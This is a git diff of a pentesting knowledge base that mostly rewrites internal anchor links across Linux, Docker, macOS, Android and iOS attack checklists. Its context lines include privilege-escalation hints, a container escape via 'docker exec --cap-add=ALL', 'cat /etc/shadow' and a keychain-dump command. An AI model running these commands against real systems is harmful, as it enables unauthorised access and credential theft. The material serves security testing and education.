- [ ] [**Sudo/SUID binary without path indicated**](privilege-escalation/index.html#sudo-command-suid-binary-without-command-path)?
- [ ] [**SUID binary specifying path**](privilege-escalation/index.html#suid-binary-with-command-path)? Bypass
- [ ] [**LD_PRELOAD vuln**](privilege-escalation/index.html#ld_preload)
- [ ] [**Lack of .so library in SUID binary**](privilege-escalation/index.html#suid-binary-so-injection) from a writable folder?
- [ ] [**SUDO tokens available**](privilege-escalation/index.html#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/index.html#var-run-sudo-ts-less-than-username-greater-than)?
- [ ] Can you [**read or modify sudoers files**](privilege-escalation/index.html#etc-sudoers-etc-sudoers-d)?
- [ ] Can you [**modify /etc/ld.so.conf.d/**](privilege-escalation/index.html#etc-ld-so-conf-d)?
- [ ] [**OpenBSD DOAS**](privilege-escalation/index.html#doas) command
### [Capabilities](privilege-escalation/#capabilities)
### [Capabilities](privilege-escalation/index.html#capabilities)
- [ ] Has any binary any **unexpected capability**?
### [ACLs](privilege-escalation/#acls)
### [ACLs](privilege-escalation/index.html#acls)
- [ ] Has any file any **unexpected ACL**?
### [Open Shell sessions](privilege-escalation/#open-shell-sessions)
### [Open Shell sessions](privilege-escalation/index.html#open-shell-sessions)
- [ ] **screen**
- [ ] **tmux**
### [SSH](privilege-escalation/#ssh)
### [SSH](privilege-escalation/index.html#ssh)
- [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)
- [ ] [**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)
- [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/index.html#debian-openssl-predictable-prng-cve-2008-0166)
- [ ] [**SSH Interesting configuration values**](privilege-escalation/index.html#ssh-interesting-configuration-values)
### [Interesting Files](privilege-escalation/#interesting-files)
### [Interesting Files](privilege-escalation/index.html#interesting-files)
- [ ] **Profile files** - Read sensitive data? Write to privesc?
- [ ] **passwd/shadow files** - Read sensitive data? Write to privesc?
@ -128,17 +128,17 @@
- [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne**
- [ ] **Generic search**
### [**Writable Files**](privilege-escalation/#writable-files)
### [**Writable Files**](privilege-escalation/index.html#writable-files)
- [ ] **Modify python library** to execute arbitrary commands?
- [ ] Can you **modify log files**? **Logtotten** exploit
- [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit
- [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)?
- [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/index.html#init-init-d-systemd-and-rc-d)?
### [**Other tricks**](privilege-escalation/#other-tricks)
### [**Other tricks**](privilege-escalation/index.html#other-tricks)
- [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
- [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
- [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/index.html#nfs-privilege-escalation)?
- [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/index.html#escaping-from-restricted-shells)?
{{#include ../banners/hacktricks-training.md}}

4
src/linux-hardening/privilege-escalation/README.md
View File

@ -628,7 +628,7 @@ After setting up the `socat` connection, you can execute commands directly in th
### Others
Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
Check **more ways to break out from docker or abuse it to escalate privileges** in:
@ -1521,7 +1521,7 @@ aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
```
In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful.
In order to **read logs the group** [**adm**](interesting-groups-linux-pe/index.html#adm-group) will be really helpful.
### Shell files

2
src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md
View File

@ -33,7 +33,7 @@ You could also **abuse a mount to escalate privileges** inside the container.
### Escaping from the container
- **`--privileged`** -> With this flag you [remove all the isolation from the container](docker-privileged.md#what-affects). Check techniques to [escape from privileged containers as root](docker-breakout-privilege-escalation/#automatic-enumeration-and-escape).
- **`--privileged`** -> With this flag you [remove all the isolation from the container](docker-privileged.md#what-affects). Check techniques to [escape from privileged containers as root](docker-breakout-privilege-escalation/index.html#automatic-enumeration-and-escape).
- **`--cap-add=<CAPABILITY/ALL> [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable]`** -> To [escalate abusing capabilities](../linux-capabilities.md), **grant that capability to the container** and disable other protection methods that may prevent the exploit to work.
### Curl

2
src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md
View File

@ -82,7 +82,7 @@ docker exec -it ---cap-add=ALL bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be
docker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash
```
Now, the user can escape from the container using any of the [**previously discussed techniques**](./#privileged-flag) and **escalate privileges** inside the host.
Now, the user can escape from the container using any of the [**previously discussed techniques**](#privileged-flag) and **escalate privileges** inside the host.
## Mount Writable Folder

2
src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
View File

@ -239,7 +239,7 @@ Finally, if you don't like any of the suggestions of before, or they aren't work
../docker-security/
{{#endref}}
If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../#writable-docker-socket)**.**
If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../index.html#writable-docker-socket)**.**
{{#ref}}
https://github.com/KrustyHack/docker-privilege-escalation

2
src/linux-hardening/privilege-escalation/linux-capabilities.md
View File

@ -1305,7 +1305,7 @@ In this case the group shadow was impersonated so you can read the file `/etc/sh
cat /etc/shadow
```
If **docker** is installed you could **impersonate** the **docker group** and abuse it to communicate with the [**docker socket** and escalate privileges](./#writable-docker-socket).
If **docker** is installed you could **impersonate** the **docker group** and abuse it to communicate with the [**docker socket** and escalate privileges](#writable-docker-socket).
## CAP_SETFCAP

2
src/macos-hardening/macos-auto-start-locations.md
View File

@ -1658,7 +1658,7 @@ kextunload /path/to/kext.kext
kextunload -b com.apple.driver.ExampleBundle
```
For more information about [**kernel extensions check this section**](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers).
For more information about [**kernel extensions check this section**](macos-security-and-privilege-escalation/mac-os-architecture/index.html#i-o-kit-drivers).
### ~~amstoold~~

2
src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
View File

@ -4,7 +4,7 @@
## Intro
As [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
As [**previously commented**](#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected.
**The following is a summary of the research [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe). Check it for further technical details!**

2
src/macos-hardening/macos-security-and-privilege-escalation/README.md
View File

@ -95,7 +95,7 @@ Therefore, an attacker that wants to successfully compromise a macOS machine wil
These privileges are usually given in the form of **entitlements** the application is signed with, or the application might requested some accesses and after the **user approving them** they can be found in the **TCC databases**. Another way a process can obtain these privileges is by being a **child of a process** with those **privileges** as they are usually **inherited**.
Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses).
Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/index.html#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses).
## macOS Traditional Privilege Escalation

4
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
View File

@ -6,7 +6,7 @@
Create a **dylib** with an **`__interpose`** section (or a section flagged with **`S_INTERPOSING`**) containing tuples of **function pointers** that refer to the **original** and the **replacement** functions.
Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](../macos-proces-abuse/macos-library-injection/#check-restrictions).&#x20;
Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](../macos-proces-abuse/macos-library-injection/index.html#check-restrictions).&#x20;
### Interpose printf
@ -286,7 +286,7 @@ int main(int argc, const char * argv[]) {
In this page different ways to hook functions were discussed. However, they involved **running code inside the process to attack**.
In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](../macos-dyld-hijacking-and-dyld_insert_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port).
In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](../macos-dyld-hijacking-and-dyld_insert_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/index.html#dylib-process-injection-via-task-port).
However, both options are **limited** to **unprotected** binaries/processes. Check each technique to learn more about the limitations.

4
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
View File

@ -10,7 +10,7 @@ IOKit drivers will basically **export functions from the kernel**. These functio
**IOKit XNU kernel code** is opensourced by Apple in [https://github.com/apple-oss-distributions/xnu/tree/main/iokit](https://github.com/apple-oss-distributions/xnu/tree/main/iokit). Moreover, the user space IOKit components are also opensource [https://github.com/opensource-apple/IOKitUser](https://github.com/opensource-apple/IOKitUser).
However, **no IOKit drivers** are opensource. Anyway, from time to time a release of a driver might come with symbols that makes it easier to debug it. Check how to [**get the driver extensions from the firmware here**](./#ipsw)**.**
However, **no IOKit drivers** are opensource. Anyway, from time to time a release of a driver might come with symbols that makes it easier to debug it. Check how to [**get the driver extensions from the firmware here**](#ipsw)**.**
It's written in **C++**. You can get demangled C++ symbols with:
@ -166,7 +166,7 @@ There are **other** functions that can be used to call IOKit functions apart of
## Reversing driver entrypoint
You could obtain these for example from a [**firmware image (ipsw)**](./#ipsw). Then, load it into your favourite decompiler.
You could obtain these for example from a [**firmware image (ipsw)**](#ipsw). Then, load it into your favourite decompiler.
You could start decompiling the **`externalMethod`** function as this is the driver function that will be receiving the call and calling the correct function:

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
View File

@ -108,7 +108,7 @@ python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d1
#### **Dump keychain keys (with passwords) with memory dump**
[Follow these steps](../#dumping-memory-with-osxpmem) to perform a **memory dump**
[Follow these steps](../index.html#dumping-memory-with-osxpmem) to perform a **memory dump**
```bash
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
View File

@ -22,7 +22,7 @@ Please note that **most of the tricks about privilege escalation affecting Linux
### Sudo Hijacking
You can find the original [Sudo Hijacking technique inside the Linux Privilege Escalation post](../../linux-hardening/privilege-escalation/#sudo-hijacking).
You can find the original [Sudo Hijacking technique inside the Linux Privilege Escalation post](../../linux-hardening/privilege-escalation/index.html#sudo-hijacking).
However, macOS **maintains** the user's **`PATH`** when he executes **`sudo`**. Which means that another way to achieve this attack would be to **hijack other binaries** that the victim sill execute when **running sudo:**

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md
View File

@ -6,7 +6,7 @@
Create a **dylib** with an **`__interpose` (`__DATA___interpose`)** section (or a section flagged with **`S_INTERPOSING`**) containing tuples of **function pointers** that refer to the **original** and the **replacement** functions.
Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](macos-library-injection/#check-restrictions).
Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](macos-library-injection/index.html#check-restrictions).
### Interpose printf
@ -306,7 +306,7 @@ int main(int argc, const char * argv[]) {
In this page different ways to hook functions were discussed. However, they involved **running code inside the process to attack**.
In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port).
In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/index.html#dylib-process-injection-via-task-port).
However, both options are **limited** to **unprotected** binaries/processes. Check each technique to learn more about the limitations.

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
View File

@ -247,7 +247,7 @@ And **MIG clients** will use the `__NDR_record` to send with `__mach_msg` to the
As many binaries now use MIG to expose mach ports, it's interesting to know how to **identify that MIG was used** and the **functions that MIG executes** with each message ID.
[**jtool2**](../../macos-apps-inspecting-debugging-and-fuzzing/#jtool2) can parse MIG information from a Mach-O binary indicating the message ID and identifying the function to execute:
[**jtool2**](../../macos-apps-inspecting-debugging-and-fuzzing/index.html#jtool2) can parse MIG information from a Mach-O binary indicating the message ID and identifying the function to execute:
```bash
jtool2 -d __DATA.__const myipc_server | grep MIG

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
View File

@ -15,7 +15,7 @@ macos-dyld-process.md
## **DYLD_INSERT_LIBRARIES**
This is like the [**LD_PRELOAD on Linux**](../../../../linux-hardening/privilege-escalation/#ld_preload). It allows to indicate a process that is going to be run to load a specific library from a path (if the env var is enabled)
This is like the [**LD_PRELOAD on Linux**](../../../../linux-hardening/privilege-escalation/index.html#ld_preload). It allows to indicate a process that is going to be run to load a specific library from a path (if the env var is enabled)
This technique may be also **used as an ASEP technique** as every application installed has a plist called "Info.plist" that allows for the **assigning of environmental variables** using a key called `LSEnvironmental`.

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
View File

@ -238,9 +238,9 @@ Therefore, if the user manages to restart TCC with a $HOME env variable pointing
> [!TIP]
> Note that Apple uses the setting stored within the user's profile in the **`NFSHomeDirectory`** attribute for the **value of `$HOME`**, so if you compromise an application with permissions to modify this value (**`kTCCServiceSystemPolicySysAdminFiles`**), you can **weaponize** this option with a TCC bypass.
### [CVE-20209934 - TCC](./#c19b) <a href="#c19b" id="c19b"></a>
### [CVE-20209934 - TCC](#c19b) <a href="#c19b" id="c19b"></a>
### [CVE-2020-27937 - Directory Utility](./#cve-2020-27937-directory-utility-1)
### [CVE-2020-27937 - Directory Utility](#cve-2020-27937-directory-utility-1)
### CVE-2021-30970 - Powerdir

12
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -315,7 +315,7 @@ Also remember that the code of an activity starts in the **`onCreate`** method.
When an Activity is exported you can invoke its screen from an external app. Therefore, if an activity with **sensitive information** is **exported** you could **bypass** the **authentication** mechanisms **to access it.**
[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/#activities)
[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/index.html#activities)
You can also start an exported activity from adb:
@ -337,14 +337,14 @@ adb shell am start -n com.example.demo/com.example.test.MainActivity
#### Tapjacking
If tapjacking isn't prevented, you could abuse the exported activity to make the **user perform unexpected actions**. For more info about [**what is Tapjacking follow the link**](./#tapjacking).
If tapjacking isn't prevented, you could abuse the exported activity to make the **user perform unexpected actions**. For more info about [**what is Tapjacking follow the link**](#tapjacking).
### Exploiting Content Providers - Accessing and manipulating sensitive information
[**Read this if you want to refresh what is a Content Provider.**](android-applications-basics.md#content-provider)\
Content providers are basically used to **share data**. If an app has available content providers you may be able to **extract sensitive** data from them. It also interesting to test possible **SQL injections** and **Path Traversals** as they could be vulnerable.
[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/#content-providers)
[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/index.html#content-providers)
### **Exploiting Services**
@ -352,7 +352,7 @@ Content providers are basically used to **share data**. If an app has available
Remember that a the actions of a Service start in the method `onStartCommand`.
As service is basically something that **can receive data**, **process** it and **returns** (or not) a response. Then, if an application is exporting some services you should **check** the **code** to understand what is it doing and **test** it **dynamically** for extracting confidential info, bypassing authentication measures...\
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/#services)
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/index.html#services)
### **Exploiting Broadcast Receivers**
@ -360,7 +360,7 @@ As service is basically something that **can receive data**, **process** it and
Remember that a the actions of a Broadcast Receiver start in the method `onReceive`.
A broadcast receiver will be waiting for a type of message. Depending on ho the receiver handles the message it could be vulnerable.\
[**Learn how to exploit Broadcast Receivers with Drozer.**](./#exploiting-broadcast-receivers)
[**Learn how to exploit Broadcast Receivers with Drozer.**](#exploiting-broadcast-receivers)
### **Exploiting Schemes / Deep links**
@ -525,7 +525,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
- **JavaScript Injection (XSS):** Verify that JavaScript and Plugin support is disabled for any WebViews (disabled by default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews should have access to the file system disabled (enabled by default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
- [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
- [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/index.html#cookies-flags)
---

2
src/mobile-pentesting/android-app-pentesting/android-applications-basics.md
View File

@ -229,7 +229,7 @@ To access it from a web it's possible to set a link like:
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).
Learn how to [call deep links without using HTML pages](#exploiting-schemes-deep-links).
## AIDL - Android Interface Definition Language

2
src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
View File

@ -114,7 +114,7 @@ Attack Surface:
- **Activities**: Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it.
- **Content providers**: Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal).
- **Services**:
- **is debuggable**: [Learn more](./#is-debuggeable)
- **is debuggable**: [Learn more](#is-debuggeable)
### Activities

4
src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
View File

@ -10,7 +10,7 @@ I am going to upload the APK to [https://appetize.io/](https://appetize.io) (fre
Looks like you need to win 1000000 times to get the flag.
Following the steps from [pentesting Android](./) you can decompile the application to get the smali code and read the Java code using jadx.
Following the steps from [pentesting Android]() you can decompile the application to get the smali code and read the Java code using jadx.
Reading the java code:
@ -38,7 +38,7 @@ to:
![After](<../../images/image (838).png>)
Follow the steps of [pentest Android](./) to recompile and sign the APK. Then, upload it to [https://appetize.io/](https://appetize.io) and lets see what happens:
Follow the steps of [pentest Android]() to recompile and sign the APK. Then, upload it to [https://appetize.io/](https://appetize.io) and lets see what happens:
![](<../../images/image (128).png>)

70
src/mobile-pentesting/android-checklist.md
View File

@ -3,29 +3,29 @@
{{#include ../banners/hacktricks-training.md}}
### [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals)
### [Learn Android fundamentals](android-app-pentesting/index.html#2-android-application-fundamentals)
- [ ] [Basics](android-app-pentesting/#fundamentals-review)
- [ ] [Dalvik & Smali](android-app-pentesting/#dalvik--smali)
- [ ] [Entry points](android-app-pentesting/#application-entry-points)
- [ ] [Activities](android-app-pentesting/#launcher-activity)
- [ ] [URL Schemes](android-app-pentesting/#url-schemes)
- [ ] [Content Providers](android-app-pentesting/#services)
- [ ] [Services](android-app-pentesting/#services-1)
- [ ] [Broadcast Receivers](android-app-pentesting/#broadcast-receivers)
- [ ] [Intents](android-app-pentesting/#intents)
- [ ] [Intent Filter](android-app-pentesting/#intent-filter)
- [ ] [Other components](android-app-pentesting/#other-app-components)
- [ ] [How to use ADB](android-app-pentesting/#adb-android-debug-bridge)
- [ ] [How to modify Smali](android-app-pentesting/#smali)
- [ ] [Basics](android-app-pentesting/index.html#fundamentals-review)
- [ ] [Dalvik & Smali](android-app-pentesting/index.html#dalvik--smali)
- [ ] [Entry points](android-app-pentesting/index.html#application-entry-points)
- [ ] [Activities](android-app-pentesting/index.html#launcher-activity)
- [ ] [URL Schemes](android-app-pentesting/index.html#url-schemes)
- [ ] [Content Providers](android-app-pentesting/index.html#services)
- [ ] [Services](android-app-pentesting/index.html#services-1)
- [ ] [Broadcast Receivers](android-app-pentesting/index.html#broadcast-receivers)
- [ ] [Intents](android-app-pentesting/index.html#intents)
- [ ] [Intent Filter](android-app-pentesting/index.html#intent-filter)
- [ ] [Other components](android-app-pentesting/index.html#other-app-components)
- [ ] [How to use ADB](android-app-pentesting/index.html#adb-android-debug-bridge)
- [ ] [How to modify Smali](android-app-pentesting/index.html#smali)
### [Static Analysis](android-app-pentesting/#static-analysis)
### [Static Analysis](android-app-pentesting/index.html#static-analysis)
- [ ] Check for the use of [obfuscation](android-checklist.md#some-obfuscation-deobfuscation-information), checks for noting if the mobile was rooted, if an emulator is being used and anti-tampering checks. [Read this for more info](android-app-pentesting/#other-checks).
- [ ] Check for the use of [obfuscation](android-checklist.md#some-obfuscation-deobfuscation-information), checks for noting if the mobile was rooted, if an emulator is being used and anti-tampering checks. [Read this for more info](android-app-pentesting/index.html#other-checks).
- [ ] Sensitive applications (like bank apps) should check if the mobile is rooted and should actuate in consequence.
- [ ] Search for [interesting strings](android-app-pentesting/#looking-for-interesting-info) (passwords, URLs, API, encryption, backdoors, tokens, Bluetooth uuids...).
- [ ] Special attention to [firebase ](android-app-pentesting/#firebase)APIs.
- [ ] [Read the manifest:](android-app-pentesting/#basic-understanding-of-the-application-manifest-xml)
- [ ] Search for [interesting strings](android-app-pentesting/index.html#looking-for-interesting-info) (passwords, URLs, API, encryption, backdoors, tokens, Bluetooth uuids...).
- [ ] Special attention to [firebase ](android-app-pentesting/index.html#firebase)APIs.
- [ ] [Read the manifest:](android-app-pentesting/index.html#basic-understanding-of-the-application-manifest-xml)
- [ ] Check if the application is in debug mode and try to "exploit" it
- [ ] Check if the APK allows backups
- [ ] Exported Activities
@ -33,29 +33,29 @@
- [ ] Exposed services
- [ ] Broadcast Receivers
- [ ] URL Schemes
- [ ] Is the application s[aving data insecurely internally or externally](android-app-pentesting/#insecure-data-storage)?
- [ ] Is there any [password hard coded or saved in disk](android-app-pentesting/#poorkeymanagementprocesses)? Is the app [using insecurely crypto algorithms](android-app-pentesting/#useofinsecureandordeprecatedalgorithms)?
- [ ] Is the application s[aving data insecurely internally or externally](android-app-pentesting/index.html#insecure-data-storage)?
- [ ] Is there any [password hard coded or saved in disk](android-app-pentesting/index.html#poorkeymanagementprocesses)? Is the app [using insecurely crypto algorithms](android-app-pentesting/index.html#useofinsecureandordeprecatedalgorithms)?
- [ ] All the libraries compiled using the PIE flag?
- [ ] Don't forget that there is a bunch of[ static Android Analyzers](android-app-pentesting/#automatic-analysis) that can help you a lot during this phase.
- [ ] Don't forget that there is a bunch of[ static Android Analyzers](android-app-pentesting/index.html#automatic-analysis) that can help you a lot during this phase.
### [Dynamic Analysis](android-app-pentesting/#dynamic-analysis)
### [Dynamic Analysis](android-app-pentesting/index.html#dynamic-analysis)
- [ ] Prepare the environment ([online](android-app-pentesting/#online-dynamic-analysis), [local VM or physical](android-app-pentesting/#local-dynamic-analysis))
- [ ] Is there any [unintended data leakage](android-app-pentesting/#unintended-data-leakage) (logging, copy/paste, crash logs)?
- [ ] [Confidential information being saved in SQLite dbs](android-app-pentesting/#sqlite-dbs)?
- [ ] [Exploitable exposed Activities](android-app-pentesting/#exploiting-exported-activities-authorisation-bypass)?
- [ ] [Exploitable Content Providers](android-app-pentesting/#exploiting-content-providers-accessing-and-manipulating-sensitive-information)?
- [ ] [Exploitable exposed Services](android-app-pentesting/#exploiting-services)?
- [ ] [Exploitable Broadcast Receivers](android-app-pentesting/#exploiting-broadcast-receivers)?
- [ ] Is the application [transmitting information in clear text/using weak algorithms](android-app-pentesting/#insufficient-transport-layer-protection)? is a MitM possible?
- [ ] [Inspect HTTP/HTTPS traffic](android-app-pentesting/#inspecting-http-traffic)
- [ ] Prepare the environment ([online](android-app-pentesting/index.html#online-dynamic-analysis), [local VM or physical](android-app-pentesting/index.html#local-dynamic-analysis))
- [ ] Is there any [unintended data leakage](android-app-pentesting/index.html#unintended-data-leakage) (logging, copy/paste, crash logs)?
- [ ] [Confidential information being saved in SQLite dbs](android-app-pentesting/index.html#sqlite-dbs)?
- [ ] [Exploitable exposed Activities](android-app-pentesting/index.html#exploiting-exported-activities-authorisation-bypass)?
- [ ] [Exploitable Content Providers](android-app-pentesting/index.html#exploiting-content-providers-accessing-and-manipulating-sensitive-information)?
- [ ] [Exploitable exposed Services](android-app-pentesting/index.html#exploiting-services)?
- [ ] [Exploitable Broadcast Receivers](android-app-pentesting/index.html#exploiting-broadcast-receivers)?
- [ ] Is the application [transmitting information in clear text/using weak algorithms](android-app-pentesting/index.html#insufficient-transport-layer-protection)? is a MitM possible?
- [ ] [Inspect HTTP/HTTPS traffic](android-app-pentesting/index.html#inspecting-http-traffic)
- [ ] This one is really important, because if you can capture the HTTP traffic you can search for common Web vulnerabilities (Hacktricks has a lot of information about Web vulns).
- [ ] Check for possible [Android Client Side Injections](android-app-pentesting/#android-client-side-injections-and-others) (probably some static code analysis will help here)
- [ ] [Frida](android-app-pentesting/#frida): Just Frida, use it to obtain interesting dynamic data from the application (maybe some passwords...)
- [ ] Check for possible [Android Client Side Injections](android-app-pentesting/index.html#android-client-side-injections-and-others) (probably some static code analysis will help here)
- [ ] [Frida](android-app-pentesting/index.html#frida): Just Frida, use it to obtain interesting dynamic data from the application (maybe some passwords...)
### Some obfuscation/Deobfuscation information
- [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code)
- [ ] [Read here](android-app-pentesting/index.html#obfuscating-deobfuscating-code)
{{#include ../banners/hacktricks-training.md}}

60
src/mobile-pentesting/ios-pentesting-checklist.md
View File

@ -6,61 +6,61 @@
- [ ] Read [**iOS Basics**](ios-pentesting/ios-basics.md)
- [ ] Prepare your environment reading [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md)
- [ ] Read all the sections of [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) to learn common actions to pentest an iOS application
- [ ] Read all the sections of [**iOS Initial Analysis**](ios-pentesting/index.html#initial-analysis) to learn common actions to pentest an iOS application
### Data Storage
- [ ] [**Plist files**](ios-pentesting/#plist) can be used to store sensitive information.
- [ ] [**Core Data**](ios-pentesting/#core-data) (SQLite database) can store sensitive information.
- [ ] [**YapDatabases**](ios-pentesting/#yapdatabase) (SQLite database) can store sensitive information.
- [ ] [**Firebase**](ios-pentesting/#firebase-real-time-databases) miss-configuration.
- [ ] [**Realm databases**](ios-pentesting/#realm-databases) can store sensitive information.
- [ ] [**Couchbase Lite databases**](ios-pentesting/#couchbase-lite-databases) can store sensitive information.
- [ ] [**Binary cookies**](ios-pentesting/#cookies) can store sensitive information
- [ ] [**Cache data**](ios-pentesting/#cache) can store sensitive information
- [ ] [**Automatic snapshots**](ios-pentesting/#snapshots) can save visual sensitive information
- [ ] [**Keychain**](ios-pentesting/#keychain) is usually used to store sensitive information that can be left when reselling the phone.
- [ ] [**Plist files**](ios-pentesting/index.html#plist) can be used to store sensitive information.
- [ ] [**Core Data**](ios-pentesting/index.html#core-data) (SQLite database) can store sensitive information.
- [ ] [**YapDatabases**](ios-pentesting/index.html#yapdatabase) (SQLite database) can store sensitive information.
- [ ] [**Firebase**](ios-pentesting/index.html#firebase-real-time-databases) miss-configuration.
- [ ] [**Realm databases**](ios-pentesting/index.html#realm-databases) can store sensitive information.
- [ ] [**Couchbase Lite databases**](ios-pentesting/index.html#couchbase-lite-databases) can store sensitive information.
- [ ] [**Binary cookies**](ios-pentesting/index.html#cookies) can store sensitive information
- [ ] [**Cache data**](ios-pentesting/index.html#cache) can store sensitive information
- [ ] [**Automatic snapshots**](ios-pentesting/index.html#snapshots) can save visual sensitive information
